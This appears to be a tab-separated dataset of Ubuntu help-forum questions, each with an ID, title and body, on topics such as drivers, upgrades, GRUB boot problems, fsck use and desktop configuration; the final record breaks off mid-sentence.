353602	i 'd like to use the application - i do not want to see it 's icon wiggle !	apparently it seems that the designers of unity operates under the current logic : if a user types 'gimp ' into the launcher this means a : if gimp is not running : the user wants to start gimp . or b : if gimp is already running : the user wants to see the gimp-icon in the launcher wiggle for a couple of seconds . the user is not at all interested in switching to the gimp - nope - that 's not why the user typed gimp . typing gimp means : let me see a wiggling gimp-icon ! however - i 'm an old-fashioned kinda ' guy . when i type 'gimp ' into a launcher it means that i would like to actually use gimp ! is there a way to tell unity to bring gimp ( or any other application ) to the front with focus as a response to me typing 'gimp ' ( or any other application name ) in the launcher ?
353607	slow microsd card	i 've recently bought a 64gb microsd class10 card . now according to wikipedia , it should be able to transfer files at a rate of max 10mb/s . but i am only reaching 6.7mb/s ( two-third of the promised speed ) : i 've formatted the card to fat32 , but i was wondering if formatting it to another file system would increase the transfer rate . one condition : the file system on the card needs to be usable by android ( samsung galaxy s4 in particular ) . the formatting options : are they maybe any other solutions to speeding up the sd card ?
353609	upgrading from 9 to 13 , do i have to go through minor versions ?	can i go 9.04 - > 10.04 - > 11.04 - > 12.04 - > 13.04 or do i need to go 'through ' minor versions , i.e . 9.04 - > 9.10 - > 10.04 - > 10.10 - > 11.04 - > 11.10 - > 12.04 - > 12.10 - > 13.04
353611	installing drivers for `` bt-930 buslogic flashpoint lt '' , ubuntu 12.04	i 'm trying to install the driver for a scsi controller card : bt-930 buslogic flashpoint lt . i 'm on ubuntu 12.04 64-bit with kernel 3.2.0-54-generic . i have ( i think ) the tarball i require and is sitting on the desktop : buslogic-2.0.15.tar.gz and i have already unzipped it and it contains 9 files , 2 of which are .c files and one .h file , as well as various readme and release notes documents . these are the install instructions i have , but i think they were written for another and/or earlier version of linux . 588 this distribution was prepared for linux kernel version 2.0.35 , but should be 589 compatible with 2.0.4 or any later 2.0 series kernel . 590 591 to install the new buslogic scsi driver , you may use the following commands , 592 replacing `` /usr/src '' with wherever you keep your linux kernel source tree : 593 594 cd /usr/src 595 tar -xvzf buslogic-2.0.15.tar.gz 596 mv readme . * license . * buslogic . [ ch ] flashpoint.c linux/drivers/scsi 597 patch -p0 < buslogic.patch ( only for 2.0.33 and below ) 598 cd linux 599 make config 600 make depend 601 make zimage 602 603 then install `` arch/i386/boot/zimage '' as your standard kernel , run lilo if 604 appropriate , and reboot . as a linux newbie , most of these lines mean absolutely nothing to me , but i 've typed them into terminal , copied and pasted them even , but all to no avail . please can someone write me a new set of instructions for my version of ubuntu that will work . thanks .
353615	my brother dcp-7030 printer does not work	unfortunately , i have downloaded the ubuntu update , and since then my printer does not work . it seems the driver does n't work , but the printer is shown to be on-line and ready to go . can anyone tell me how to download the correct driver and install it ?
353616	winscp installation issue	i have installed wine and after that i tried install the winscp and i get this error c : \program files ( x86 ) \winscp\dragext64.dll unable to register the dll/ocx : regsvr32 failed with exit code 0x1 . click retry to try again , ignore to proceed anyway ( not recommended ) , or abort to cancel installation
353618	xubuntu 13.04 and macbook pro 8.2	i 've just recently installed xubuntu 13.04 on my early macbook pro and some things do n't work while others do . i looked around and i ca n't find any good fixes for these problems . i have the 2010 model macbook pro 13 '' 8.2 posting 4 separate questions so that others can troubleshoot easier the screen and keyboard backlight are at max whenever i boot up and i ca n't lower the keyboard backlight
353621	will ubuntu touch have this transparency effect ?	i saw the following stunning images of ubuntu touch and wonder whether the glass blur effect is to be implemented . so , is there chance to see this really in ubuntu touch 1.0 ?
353622	hot corner configuration	i want to be able to use hot-corner like this : hot corner ( top right ) to exposăš hot corner ( bottom right ) change virtual desktops hot corner ( bottom left ) show desktop is it possible ? ubuntu with unity has hot-corner suport ? can configure it like the above description . if not if i can install compiz or any other valid option ? does gnome3 what i need ? if not , can i install compiz or any other valid option and wat about mate does it do what i need ? if not can i install compiz or any other valid option
353627	start dropbox on system start ( not login )	i am running dropbox just fine on a 13.04 machine . however , i want to be able to power up the machine , and have the dropbox sync start automatically for a particular user ( there is only one account on the box ) . however , it only seems to start upon login , not start . is there a way i can start the dropbox service for a user upon boot ? i am pretty sure that the 2nd checkbox below really means login , not boot .
353629	how do i reset everything in regards to my network connection ?	i 've been trying for weeks to try and get my wireless adapter ( atheros ) to play nicely with a peap network at my university . it connected to just about anything , except for the one here . after trying desperately for hours trying different commands and workarounds to get it to work correctly ( most solutions specifically made for my adapter , others for atheros in general ) , my adapter seems to have become useless . i ca n't connect to anything - wireless or lan , and it 's kind of a problem . gnome-control-panel shows the word `` unmanaged '' under the adapter name while under network settings . the wireless combobox ( for finding a network ) only shows `` other '' and selecting `` other '' does n't seem to do anything . is there a way for me to undo everything in regards to my network ? i do n't want to have to reinstall ubuntu - that would be a huge pain . i 'm also not sure what could be causing the problem . is there some way for me to clear the drivers i 've installed for the adapters and the config settings for them as well to get it working again ? for reference : ubuntu 12.04 lts x64 same adapter still works fine ( even for peap ) on windows 7/8 x64 atheros ar5bwb222 wireless network adapter and atheros ar8151 pci-e gigabit ethernet controller ( ndis 6.20 ) [ per windows device manager report ] i 've tried wicd with no success at all .
353636	edit zsh theme for virtualenv name	i use zsh theme intheloops . the theme looks like this when no virtual env . is active -- an empty line -- [ sourabh @ skynet ] ~/code/django_apps/cope ( master ) ⚡ ❯ and when an env . is active , ( env name ) [ sourabh @ skynet ] ~/code/django_apps/cope ( master ) ⚡ ❯ can i make it look like this when some virtualenv is active -- empty line -- ( env name ) [ sourabh @ skynet ] ~/code/django_apps/cope ( master ) ⚡ ❯ .zsh-theme file local return_status= '' % { $ fg [ red ] % } % ( ? ..⏎ ) % { $ reset_color % } '' local host_color= '' green '' if [ -n `` $ ssh_client '' ] ; then local host_color= '' red '' fi prompt=' % { $ fg_bold [ grey ] % } [ % { $ reset_color % } % { $ fg_bold [ $ { host_color } ] % } % n @ % m % { $ reset_color % } % { $ fg_bold [ grey ] % } ] % { $ reset_color % } % { $ fg_bold [ blue ] % } % 10c % { $ reset_color % } $ ( git_prompt_info ) $ ( git_remote_status ) % { $ fg_bold [ cyan ] % } ❯ % { $ reset_color % } ' rprompt= ' $ { return_status } % { $ reset_color % } ' zsh_theme_git_prompt_prefix= '' % { $ fg [ yellow ] % } ( % { $ fg [ yellow ] % } '' zsh_theme_git_prompt_suffix= '' % { $ reset_color % } '' zsh_theme_git_prompt_dirty= '' % { $ fg [ yellow ] % } ) % { $ fg [ pink ] % } ⚡ % { $ reset_color % } '' zsh_theme_git_prompt_clean= '' % { $ fg [ grey ] % } ) '' zsh_theme_git_prompt_behind_remote= '' % { $ fg_bold [ magenta ] % } ↓ % { $ reset_color % } '' zsh_theme_git_prompt_ahead_remote= '' % { $ fg_bold [ magenta ] % } ↑ % { $ reset_color % } '' zsh_theme_git_prompt_diverged_remote= '' % { $ fg_bold [ magenta ] % } ↕ % { $ reset_color % } ''
353638	trackpad gestures	does any one knows a application to detect the multitouch of a laptop and use it to do gestures like macosx . slide sideways with 3 fingers to change virtual desktops move upwards with 3 fingers to do a exposăš move downwards with 3 fingers to show desktop configure other gestures that i might need
353639	cronjob bash not exporting	i have written the following script to run for when users have last logged in . i am trying to export a cronjob to a .out file . for some reason , i can not get it to export . # ! /bin/bash for user in $ ( cd /home ; ls -- hide=lost+found ) ; do echo `` $ user online since : '' who | awk ' { print `` \tuser : `` $ 1 '' - terminal : `` $ 2 '' - `` $ 3 '' `` $ 4 } ' now= $ ( date + % s -d `` jan 1 , 1980 00:00:01 '' ) usr= $ ( lastlog |awk ' { print $ 1 , `` : '' , $ 5 , $ 6 , $ 9 } ' | grep $ user ) usrdate= $ ( echo $ usr | cut -d `` : '' -f2 ) ( ( usrdate = $ ( date -- date `` $ usrdate '' + % s ) / 86400 ) ) ( ( now = now/86400 ) ) ( ( days = now - usrdate ) ) done file= '' /home/mike/watchuser '' outputfile= '' /tmp/watchuser.out '' if [ `` $ 1 '' == 'out ' ] then file = $ outputfile fi done i believe the bash was moved to the correct directory /home/mike/watchuser . [ root @ ip-10-245-82-234 ec2-user ] # ls -l /home/mike/watchuser -rwxr -- r -- . 1 mike student 564 oct 3 20:50 /home/mike/watchuser also , when ls -l of the /tmp/ folder , i reiceve the following : [ root @ ip-10-245-82-234 ec2-user ] # ls -l /tmp/ total 4 -rw -- -- -- - . 1 mike mike 34 dec 31 1969 crontab.rjikgb -rw-r -- r -- . 1 root root 0 oct 3 21:57 watchuser.out here is my /etc/crontab edit : */10 * * * * mike /home/mike/watchuser > > /tmp/watchuser.out
353641	how do i upgrade from 12.04 to 12.04.3 ?	i have so many bugs in my ubuntu 12.04 lts that i have lost count and the energy to fix them . the system wo n't upgrade properly or even update packages any more . when i log in i get a black screen first . then , if i press return , i get to the log in screen . when i get to the desktop , some times my folders are n't there - so i use gnome-do to find a folder and suddenly the stuff appears on my desktop out of the blue . i have lived with these bugs perhaps just a few months after 12.04 lts came out and it 's the first version of ubuntu i have ever had problems with . my question is two-fold : what 's the best way of cleaning up this mess ? if i already have ubuntu 12.04 lts and have a cd with ubuntu 12.04.3 , can it upgrade my old system with that cd without making a new partition ? i just want to get rid of all these bugs so i can go ahead and do my work .
353653	how to navigate to windows 7 shared folders from ubuntu guest with terminal ?	i 'm running a virtualbox with ubuntu 64-bit , configured as a bitnami djangostack . i 'm running this within a windows 7 64-bit host . though my virtualbox is what runs the server , i 'd like my website files to be hosted on my main machine ( windows 7 ) for easier editing . i set up virtualbox to share the specific windows 7 folder with my ubuntu guest . it is set to automatically mount . now , i 'd like to navigate to that folder from my ubuntu terminal ( no gui installed ) . how should i do that ?
353656	ubuntu 12.04.3 alternate raid 1	i have a problem installing ubuntu 12.04.3 alternate with cd , because i need to make a raid 1 but when i make the partitions for example , de dialog box to choose primary or logic partition doesnt ' appears . then the system does n't allow me to set the partition as booteable partition . i have not experience with ubuntu , but it 's really strange for me that all the tutorials shows the same but when i do it here i do n't see the same that the tutorials . if someone can help me i will appreciate it . thanks ! !
353657	remove microphone noise ubuntu 13.10	i had windows 8 and i was using camtasia to record my screen and my voice via a microphone . the quality of voice was well . i just migrated to ubuntu 13.10 and tried recordmyscreen and kazam to record screen . but the quality of sound is bad and has a lot of noises . how can i solve that ? my laptop model is nspiron 5010
353661	vi wo n't let me save my vimrc file	i have changed the permissions to allow for : -rwxrwxr -- 1 root root 2214 oct 4 09:45 vimrc and it still wo n't let me save to the file . i only have one user on this box and it has admin rights . everytime i make changes to the file and try and save it tells me i 'm trying to make changes to a read only file and to hit ! to override . when i do that and hit ! zz it still does n't save .
353663	how do i install the kernel 3-11.2 on ubuntu 13.04 ?	i would like to install kernel 3-11.2 on ubuntu 13.04 ( i found this link git : //git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git linux-3.11.y ) . how do i manage to do it ? also , is it safe to just install a kernel ? do i have to backup any important files before proceeding ? what does `` kernel header files '' stand for ?
353674	ubuntu touch on samsung galaxy wonder ( gt-i8150 )	can i install ubuntu touch on my device ? cpu : 1.4 ghz single-core qualcomm scorpion msm8255t snapdragon soc processor ram : 512 mb ( 351 mb for user ) storage : 4 gb removable storage : micro sd up to 32 gb
353675	kate , kile and other kde applications crash in ubuntu	i seem to have some issues with gtk libraries when trying to open kde applications on my ubnutu . including kate , kile , etc ( also the problem was observed when opening mendeley desktop ) the system is a 64-bit ubuntu 12.04 attached are error messages : for kate : qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . gtk-message : failed to load module `` canberra-gtk-module '' gtk-message : failed to load module `` canberra-gtk-module '' gtk-message : failed to load module `` canberra-gtk-module '' enchant dict for `` en_us '' 0x195af30 kate ( 4995 ) /kate ( on-the-fly spellcheck ) kateontheflychecker : :kateontheflychecker : created kate ( 4995 ) /kate ( on-the-fly spellcheck ) kateontheflychecker : :updateconfig : enchant dict for `` en_us '' 0x19644b0 kate ( 4995 ) /kate ( on-the-fly spellcheck ) kateontheflychecker : :freedocument : kate ( 4995 ) /kate-filetree katefiletreepluginview : :katefiletreepluginview : begin : mw : kate : :mainwindow ( 0x17d6af0 ) kate ( 4995 ) /kate-filetree proxyitem : :proxyitem : proxyitem ( 0x2139b60,0x0 , -1 , qobject ( 0x0 ) , '' m_root '' ) kate ( 4995 ) /kate-filetree proxyitem : :proxyitem : proxyitem ( 0x213a4f0,0x0 , -1 , qobject ( 0x0 ) , '' untitled '' ) kate ( 4995 ) /kate-filetree katefiletreemodel : :documentopened : before add : proxyitem ( 0x213a4f0,0x0 , -1 , katedocument ( 0x19387a0 ) , `` untitled '' ) kate ( 4995 ) /kate-filetree katefiletreemodel : :setupicon : begin ! kate ( 4995 ) /kate-filetree katefiletreemodel : :setupicon : end ! kate ( 4995 ) /kate-filetree katefiletreemodel : :handleinsert : begin ! kate ( 4995 ) /kate-filetree katefiletreemodel : :handleinsert : empty item kate ( 4995 ) /kate-filetree proxyitem : :addchild : added proxyitem ( 0x213a4f0,0x2139b60,0 , katedocument ( 0x19387a0 ) , `` untitled '' ) to proxyitemdir ( 0x2139b60,0x0 , -1 , '' m_root '' , children:1 ) kate ( 4995 ) /kate-filetree katefiletreemodel : :documentopened : after add : proxyitem ( 0x213a4f0,0x2139b60,0 , katedocument ( 0x19387a0 ) , `` untitled '' ) kate ( 4995 ) /kate-filetree katefiletreeproxymodel : :katefiletreeproxymodel : begin ! kate ( 4995 ) /kate-filetree katefiletreepluginview : :setlistmode : begin kate ( 4995 ) /kate-filetree katefiletreepluginview : :setlistmode : treemode kate ( 4995 ) /kate-filetree katefiletreepluginview : :setlistmode : end can not mix incompatible qt library ( version 0x40801 ) with this library ( version 0x40804 ) kcrash : application 'kate ' crashing ... kcrash : attempting to start /usr/lib/kde4/libexec/drkonqi from kdeinit sock_file=/home/alireza/.kde/socket-alireza-optiplex-755/kdeinit4__0 for kile : qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . kile ( 5037 ) /kdecore ( klibrary ) findlibraryinternal : plugins should not have a 'lib ' prefix : `` libkonsolepart.so '' enchant dict for `` en_us '' 0x25a1300 kile ( 5037 ) /kate ( on-the-fly spellcheck ) kateontheflychecker : :kateontheflychecker : created kile ( 5037 ) /kate ( on-the-fly spellcheck ) kateontheflychecker : :updateconfig : enchant dict for `` en_us '' 0x25aa650 kile ( 5037 ) /kate ( on-the-fly spellcheck ) kateontheflychecker : :freedocument : kile ( 5037 ) /kate ( on-the-fly spellcheck ) kateontheflychecker : :updateconfig : enchant dict for `` en_us '' 0x25da0d0 kile ( 5037 ) /konsole konsole : :session : :run : attempted to re-run an already running session . can not mix incompatible qt library ( version 0x40801 ) with this library ( version 0x40804 ) kcrash : application 'kile ' crashing ... kcrash : attempting to start /usr/lib/kde4/libexec/drkonqi from kdeinit sock_file=/home/alireza/.kde/socket-alireza-optiplex-755/kdeinit4__0 for mendeley : using system qt version 4.8.1 in /usr/lib/x86_64-linux-gnu /usr/bin/../../opt/mendeleydesktop/bin/mendeleydesktop : symbol lookup error : /usr/bin/../../opt/mendeleydesktop/bin/mendeleydesktop : undefined symbol : _zn10qsslsocket16staticmetaobjecte any ideas of a fix ?
353677	mp3 player usb - error creating moint point : input/output error	i got a error message saying my mp3 player wo n't mount , the message said something like this : error creating moint point : input/output error and thus does not allow me to read or write it , i tried something called sudo parted -l and it showed me this : '' user @ yuhsd70-b2oaas099113 : ~ $ sudo parted -l model : ata wdc wd2500bpvt-8 ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 32.3kb 6449mb 6449mb primary ext4 boot 2 6449mb 7534mb 1086mb primary ext4 3 7534mb 250gb 243gb primary ext4 model : coby mp3 player ( scsi ) disk /dev/sdb : 4035mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 16.4kb 4035mb 4035mb primary fat32 boot '' how do i fix this ? please respond !
353680	boot trouble please help	i have a dell dimension 4550 with ubuntu installed . it has been flawless until i changed power settings to turn monitor off at idol and also to turn hard disks off at idol . no problems after re configuring those options . now when i power it up it races pass the boot screen and menu so fast i can not enter a boot option . please tell me how i can configure either a recovery disk , boot disk , or usb that will allow me to get it up and running then i will revert back to old settings even though i do n't like letting drive and monitor always run
353682	make a c++ project in eclipse	i installed eclipse , jdk , gcc and g++ . when i open eclipse and want to make a new project , i have no option for a c++ project . what do you think ?
353683	uefi partitioning for dummies	i have been reading/researching for hours now on how to partition for a uefi enabled , secure boot windows 8 system . the language used is a bit above my head though and some steps seem to be skipped for the non ubuntu endowed minds . so very simply , i am starting right at the partition option in the installer , where i click `` something else '' instead of erasing the whole disk ( because i want to keep windows 8 as well ) . now i have read that you can only have one uefi partition . great . sounds good . now do i also need a partition for installing linux with the ext3/4 , or do i do as one guide said and format it in fat32 ? i am lost at this point . then it goes on talking about boot flagging and how only the uefi partition needs to be boot flagged . so here is where my dummy-ness kicks in and i am lost . i am looking for very specific instructions on how not to totally screw up the booting and install a dual-boot ubuntu/windows 8 system .
353684	why are some websites not loading only in ubuntu ?	http : //weather.yahooapis.com/forecastrss ? w=2295386 is not loading , so my weather app is not working . however it is loading from windows 7 running on same pc and connected to same network ( pppoe/dsl broadband connection ) . i have tried from firefox , chrome and chromium in ubuntu . it worked around a month ago . but now it is not loading . http : //skydrive.com also does not work in ubuntu . this is what chromium shows . wget result .
353690	how to get a netgear wg111v2 wlan stick to work properly on ubuntu 12.04 ?	i 've not much experience with wlan and ubuntu . i recently installed ubuntu 12.04 lts on a compaq pc . i therefore downloaded the newest 32-bit version from ubuntu.com i checked the version with `` lsb_release -a '' : description says : ubuntu 12.04.3 lts i checked the kernel version with `` uname -rm '' : kernel 3.8 ... i plugged the wlan stick ( netgear wg111v2 ) in and it worked but very slow ( about 500 kbit/s ) and several reconnects after some minutes . i found out that ndiswrapper could be a solution for me but therefore i would need kernel 3.2 otherwise i get an error when : sudo modprobe ndiswrapper fatal module ndiswrapper not found . i tried to downgrade ubuntu to kernel 3.2 with these commands : ( not sure if i did everything right ! ) sudo apt-get install linux-generic linux-image-generic linux-headers-generic linux-image-3.2.0-23-generic linux-headers-3.2.0-23-generic sudo apt-get purge linux-generic-lts-raring linux-image-generic-lts-raring linux-headers-3.8.0-29 linux-headers-3.8.0-29-generic linux-image-3.8.0-29-generic then i did a reboot checked kernel again with uname -rm : 3.2.0-54-generic-pae i686 fine , then i installed ndiswrapper like described here : http : //wiki.ubuntuusers.de/wlan/ndiswrapper and i also tried this tutorial : http : //www.ubuntufreunde.de/forum/500/netgear_wg111v2.html ? s=4fa84183b98e26a805bf4b96dd5b2a1d37aa3890 ( german tutorials ) the ndiswrapper seems to run and to work as it should . i tried bind in the correct inf file from the cd ( win98 driver ) and this worked with both , code or with the wifi driver window . the new driver seems to work but im not sure if it 's really the new one or the stock driver . i edited /etc/modprobe.d/blacklist and added `` blacklist rtl8187 '' i edited /etc/modules and added `` ndiswrapper '' ( of course without brackets ) but now the wifi stick wo n't connect to my wlan . ( every other wlan device in my network works just fine ) i checked the wlan password and the savety method several times - no connection . i do n't know what to do now except throwing that damn stick out of my window .
353696	how to remove pre-installed ubuntu and and install another os ?	i bought a new pc with ubuntu11.10 pre-installed but now i want to use windows 7 .
353697	unable to get ubuntu 12.04 to start on acer 5000 , it seems to install alright	after installing ubuntu 12.04 on my acer 5000 laptop i restart it and it says running ubuntu for the first time and it only gets so far and the screen blinks between different screens like it can only get so far then it does not know what to do ? it is running fine with windows xp , no errors . in windows system it says amd turion 64 mobile , technology ml-30 , 1.6ghz 448mb ram , physical address extension . could the amd system or maybe not enough ram be a problem ? it has enough ram for windows xp to run and i did not want to get any more ram until ubuntu runs on it . while it is trying to run ubuntu after it is installed the screen shows i/o errors then it looks to be installing and uninstalling parts . maybe something is resisting it like the amd system ? i am hoping someone can help and or possibly someone who ran into this type problem .
353702	upgraded from 8.04 to 10.04 , can not boot	i upgraded an old , handed down web server with a heavily customized wordpress website from 8.04 server lts to 10.04 server lts using a guide i found on ubuntu . this seemed to go fine . there were a few errors , but on the whole , the upgrade succeeded , and afterwards i had a working system , web site was still online , good deal . then i rebooted . after the reboot , i am greeted with this error message , on every boot : here is my disk information , which i got by using a linux live boot cd : i spent 8+ hours combing through forums , google , etc yesterday trying to figure this out . i 'm really at a loss . at this point , i am converting a backup of the old physical web server to a vm for a temporary website.. but this one needs to get fixed .
353703	geary 's document font	i have a vision impediment that means i ca n't easily read the default document font in geary , the email client . is there any way to change the font preference ?
353709	unreadable grub menu in a nvidia geforce lenovo ideapad z500	i installed ubuntu 12.04.03 lts on my lenovo ideapad z500 dual-boot with windows 8 . when i start the pc if i want to start ubuntu i have to enter the bios and select it from the list of the operative systems installed on my machine . it appears the grub menu , but it is unreadable . if i select the first option , better i guess to select it , ubuntu starts regularly . in my honest opinion this problem is due to the video card , nvidia geforce , but i do n't know what to do to solve this problem . i paste what you asked me to do : alessandro @ alessandro-lenovo-ideapad-z500 : ~ $ sudo uname -a [ sudo ] password for alessandro : linux alessandro-lenovo-ideapad-z500 3.8.0-31-generic # 46~precise1-ubuntu smp wed sep 11 18:21:16 utc 2013 x86_64 x86_64 x86_64 gnu/linux alessandro @ alessandro-lenovo-ideapad-z500 : ~ $ sudo lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise alessandro @ alessandro-lenovo-ideapad-z500 : ~ $ sudo lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 635m ] ( rev a1 )
353712	unable to format usb drive in ubuntu 12.10	in 12.10 there is no option to format a pen-drive by right-clicking the icon for the pen drive and selecting format . i am also unable to delete files from the usb drive . would you please help me ?
353715	how do i make and use a usb boot repair stick	i have a dell dimension 4550 that is running ubuntu . the monitor and hard disks were always on so i adjusted the power settings to turn monitor off after 5 minutes and turn hard drive off after 20 minutes . for the first couple days no problems . now when i try to boot the system i see the boot menu race by a such a fast rate i can not even get my fingers on the keys quick enough to get it to boot . how can i create a usb stick and how do i use it to get machine to boot ?
353717	preventing apt-get from downloading other packages	i 've recently installed oracle jdk on my ubuntu . now when i download any package , apt-get first tries to download oracle-java8-installer . how can i stop it from doing that ? edit : here 's the output of apt-cache policy oracle-java8-installer : oracle-java8-installer : installed : 8b108-0~webupd8~0 candidate : 8b108-0~webupd8~0 version table : *** 8b108-0~webupd8~0 0 500 http : //ppa.launchpad.net/webupd8team/java/ubuntu/ saucy/main i386 packages 100 /var/lib/dpkg/status
353718	how to install intel graphics driver for a compaq dc5100 ?	installed ubuntu 13.04 on my hp compaq dc5100 3.2 ghz , 2 gb ram , intel internal graphics . can not use more than a 1080p resolution with my ilo lcd 26 inch monitor . i would like to have a larger range .
353720	ubuntu backup asks for encryption password repeatedly	i recently had to install a fresh ubuntu . i have automatic backups of my old ubuntu . i do not wish to restore to my old state . i just need to get back specific folders containing some pdfs and doc files . the backups however are all stored in a gpg format , with names such as duplicity-inc or duplicity-new-signautes . is it possible to restore specific files from such a backup ? edit : i tried the ubuntu backup , but it keeps asking me for the encryption password repeatedly . thanks !
353727	text and windows are flipped when trying to enable display brightness in laptop	i was having problems with the brightness in a laptop ( acer aspire v5 ) with ubuntu 13.04 . basically i could n't change the bright . so i searched how to fix that and i found that i have to put this line in /etc/default/grub grub_cmdline_linux= '' quiet splash acpi_backlight=vendor '' after update-grub and reboot , the text and the windows were flipped . http : //i.stack.imgur.com/uw8y9.png i was using gnome-panel with compiz . if i start with no-effects , and no compiz , the text is straigth back . but i want to use gnome-panel with effects . i tried to reconfigure compiz and also reseting back to default the grub settings and i still ins't working . update i found using the compizconfig-settings-manager that the text flipps when enabling opengl plugin . so maybe is a strange video problem instead of a compiz malfunction . the laptop has intel and nvidia graphics . thanks
353728	kubuntu 12.04 developed issues at boot	i was running kubuntu 12.04 on an hp elitebook 8540p with 8gb ram and nvidia gpu this was installed on a external western digital my passport 500gb no issues were encountered and the system operated normally overtime , i have to assume as upgrades where installed , the system began to develop problems . first is was : ata_id [ xxx ] hdio_get_identity failed for '/dev/sdb ' : invalid argument then later i got : intel ipc turbo graphics disabled after hours of reading forums and trying different fixes i managed to screw up the system to where a reinstall was necessary . my questions are why does the system operate perfectly from the live cd and not the installed system ? why is there now the need for the turbo graphics work around ? why does the acpi=off grub parameter need to there ? why does the current installer not pick up these issues ? below this line is a journal of the what took place downloaded kubuntu-12.04.3-desktop-amd64.iso burnt dvd with k3b , burnt image at 4x speed installation to be put on western digital my passport 1tb usb3 external drive set up partions with kde partion manager /dev/sdc1 ext4 500mb /boot /dev/sdc2 ext4 30.1gb / /dev/sdc3 ext4 400gb /home /dev/sdc5 swap 8gb ran the following commands to setup partitions : $ sudo tune2fs -o extents , uninit_bg , dir_index /dev/sdc1 tune2fs 1.42 ( 29-nov-2011 ) $ sudo tune2fs -o extents , uninit_bg , dir_index /dev/sdc2 tune2fs 1.42 ( 29-nov-2011 ) $ sudo sudo tune2fs -m 1.0 -o extents , uninit_bg , dir_index /dev/sdc3 tune2fs 1.42 ( 29-nov-2011 ) $ sudo fsck -fdp /dev/sdc1 fsck from util-linux 2.20.1 boot : 11/128520 files ( 0.0 % non-contiguous ) , 26729/514048 blocks $ sudo fsck -fdp /dev/sdc2 fsck from util-linux 2.20.1 root : 11/1966560 files ( 0.0 % non-contiguous ) , 167441/7865825 blocks $ sudo fsck -fdp /dev/sdc3 fsck from util-linux 2.20.1 home : 11/26222592 files ( 0.0 % non-contiguous ) , 1696538/104858263 blocks all the above was done on an hp pavilion elite inserted dvd into hp elitebook 8540p hardwired network connection external drive not plugged in booted dvd no special commands selected - try kubuntu once booted ( no gui issues ) plugged in external drive opened dolphin - could see all partions , dvd , host hd closed dolphin clicked on install kubuntu 12.04.3 lts selected english selected - install 3rp party software - did not select download updates while installing umounted /dev/sda and /dev/sdb selected scsi8 wd my passport 0748 selected manual in the prepare partitions /dev/sdb1 ext4 /boot no format /dev/sdb2 ext4 / no format /dev/sdb3 ext4 /home no format set bootloader to /dev/sdb clicked - install now at warning clicked - continue selected eastern timezone english keyboard layout and variations clicked - continue inserted name / password / computer name / require password / no encyrpt at completion clicked restart now remove media and pressed enter at grub booted normally kernel ... ..52 at login : entered login and password pressed enter saw the disk drive and just the beginning of next icon screen goes black - no cursor hear login sound no video output pressed cntl-alt-f1 cntl-alt-del cntl-alt-f1 for reboot nexted time edited grub deleted quiet and splash to watch what is happening - added nvidia.modeset=0 no issued that i could see getting to the login this time selected kde ( failsafe session ) same problem tried i915.modeset=1 and i915.modeset=0 same problem tried nomodeset and noxforcevesa got - ata_id [ 275 ] hdio_get_identity failed for '/dev/sdb ' : invalid argument then black screen tried acpi=off nomodeset got - ata_id [ 2 ? ? ] hdio_get_identity failed for '/dev/sdb ' : invalid argument then login was successful with full operating kde desktop error messages on reboot tried acpi=off i915modeset=0 got - ata_id [ 211 ] hdio_get_identity failed for '/dev/sdb ' : invalid argument then login was successful with full operating kde desktop error messages on reboot tried acpi=ht nomodeset got - ata_id [ 265 ] hdio_get_identity failed for '/dev/sdb ' : invalid argument then black screen went back to acpi=off nomodeset got - ata_id [ 2 ? ? ] hdio_get_identity failed for '/dev/sdb ' : invalid argument then login was successful with full operating kde desktop did full upgrade in muon and installed nvidia-current rebooted error messages no grub modification got - ata_id [ 2 ? ? ] hdio_get_identity failed for '/dev/sdb ' : invalid argument intel ipc turbo graphics disabled login- black screen reboot error messages tried acpi=off got - ata_id [ 2 ? ? ] hdio_get_identity failed for '/dev/sdb ' : invalid argument intel ipc turbo graphics disabled then login was successful with full operating kde desktop added acpi=off to /etc/default/grub and ran update-grub got this from bug 724569 the workaround : boot in recovery mode then sudo vi /etc/modprobe.d/blacklist.conf add line : blacklist intel_ips finally reboot shutdown error messages last one says - nm-dispatcher.action - caught signal 15 , shutting down ... system is now hung up finished shutdown by tapping power button at least there is now a workaround , and i can use the system
353729	how do you cancel print job in 13.04 ?	in 13.04 i no longer get the print icon in the taskbar . i have to go through system settings > printers > jobs to see my print queue . but there is no way to cancel the job there . pressing the stop button does nothing and right-clicking on the job does not give an option to delete . how do you cancel jobs aside from opening a terminal and typing cancel -a ? that deletes all jobs , which is not helpful if i want to cancel a specific print job .
353730	bluetooth not working after dual boot ?	i 'm using a sony vaio vpceg38fn laptop running windows 8 pro recently i 've dual booted it with ubuntu 13.04 . from then on wards my bluetooth is not working in both windows and ubuntu first i thought it as a driver problem in windows later i came up to know that the bluetooth is not working due to the dual boot only i also tried removing ubuntu and only run windows then there is no problem with the bluetooth it 's working fine my bluetooth driver is atheros bluetooth driver please any one help me with this problem
353732	how to use fsck in ubuntu ?	i intend to use fsck for checking my linux partition of the main disk , because its file system is suspicious of being not unmounted cleanly by shutting down the system . i have searched in my environment variables : none of them except of path should control the fsck program . but the program apparently needs to be used during a boot : : ~ $ fsck -v fsck from util-linux 2.20.1 checking all file systems . [ /sbin/fsck.ext4 ( 1 ) -- / ] fsck.ext4 /dev/sda6 e2fsck 1.42 ( 29-nov-2011 ) /dev/sda6 is mounted . warning ! ! ! the filesystem is mounted . if you continue you will cause severe filesystem damage . do you really want to continue ? no check aborted . ( there is no /forcefsck file in my root according to how do i find out if there will be a fsck during the next boot ? . my etc/fstab file contains # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=1ac55d8d-c112-4bc7-9e79-921d196f9f79 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation uuid=54f7e314-50e2-419b-a45d-47c3058ecc00 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 ) . according to an answer to slow reboot - understanding fsck and tune2fs i have tried tune2fs hoping that i 'll get the present value of the max_mounts_count parameter to be able 